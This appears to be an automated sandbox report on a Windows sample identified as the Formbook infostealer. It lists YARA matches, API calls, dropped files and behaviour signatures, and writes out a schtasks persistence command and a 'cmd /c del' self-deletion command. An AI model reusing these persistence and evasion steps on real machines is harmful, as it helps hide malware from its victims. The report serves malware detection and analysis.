          Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA2278
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA1008
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA3148
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA0470
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA1849
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA52C8
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA52B9
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA40B8
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA40AA
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA3060
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA56A0
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA5468
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA5458
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA35F8
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA5880
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA2FFA
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA0F57
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_05151B00
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_05151508
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_051514F8
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_0515473F
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_05154750
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_051521E0
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_05158333
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_05151AF0
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00401030
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D9B2
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00402D8D
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00402D90
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D59A
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D5A6
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00409E60
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00402FB0
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041DFB1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C46E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF1D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C20D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6D5A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E52D8D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E52D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6D59A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E59E60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6DFAF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E52FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 03C2B150 appears 32 times
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A35E NtCreateFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A40A NtReadFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041A48A NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C69820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A490 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A410 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A35E NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A48A NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6A40A NtReadFile,
          Source: 456yqMyHvT.exeBinary or memory string: OriginalFilename vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000000.00000002.709249473.0000000009E80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000000.00000003.675653422.0000000009F2E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDirectoryStri.exe4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000007.00000000.700922823.00000000007C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDirectoryStri.exe4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000007.00000002.800667541.0000000003326000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exeBinary or memory string: OriginalFilenameDirectoryStri.exe4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dWAzsHjHs.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\dWAzsHjHs.exe B25EF1151578640A5BB9E01FADA60A8792FC4D3E92F3DDABF19BA4CD6D630F57
          Source: 456yqMyHvT.exeVirustotal: Detection: 32%
          Source: 456yqMyHvT.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\456yqMyHvT.exeFile read: C:\Users\user\Desktop\456yqMyHvT.exeJump to behavior
          Source: 456yqMyHvT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\456yqMyHvT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\456yqMyHvT.exe 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Users\user\Desktop\456yqMyHvT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\456yqMyHvT.exeFile created: C:\Users\user\AppData\Roaming\dWAzsHjHs.exeJump to behavior
          Source: C:\Users\user\Desktop\456yqMyHvT.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9071.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@2/1
          Source: C:\Users\user\Desktop\456yqMyHvT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\456yqMyHvT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_01
          Source: C:\Users\user\Desktop\456yqMyHvT.exeMutant created: \Sessions\1\BaseNamedObjects\TmFkYBWfQAulOG
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4692:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\456yqMyHvT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 456yqMyHvT.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 456yqMyHvT.exeStatic file information: File size 1205248 > 1048576
          Source: 456yqMyHvT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 456yqMyHvT.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10ca00
          Source: 456yqMyHvT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe, 0000000F.00000002.925469842.0000000003D1F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe

          Data Obfuscation:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeUnpacked PE file: 0.2.456yqMyHvT.exe.d20000.0.unpack
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeUnpacked PE file: 0.2.456yqMyHvT.exe.d20000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D23CAA push ss; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D23443 push ss; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D249F8 push eax; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D263FF push eax; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D249BA push D2F0D953h; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D26D5D push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_00D23130 push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA3309 push esp; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA5E12 push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_02FA5E08 push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_0515A116 push edi; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 0_2_0515BF75 push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041C1D3 push esp; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0040627A push ds; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_006A93A1 push 0000007Fh; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_006A6D5D push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_006A9E73 push esp; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6C1D3 push esp; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E5627A push ds; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6D56C push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6D502 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_00E6D50B push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.02347259021
          Source: initial sampleStatic PE information: section name: .text entropy: 7.02347259021
          Source: C:\Users\user\Desktop\456yqMyHvT.exeFile created: C:\Users\user\AppData\Roaming\dWAzsHjHs.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE1
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
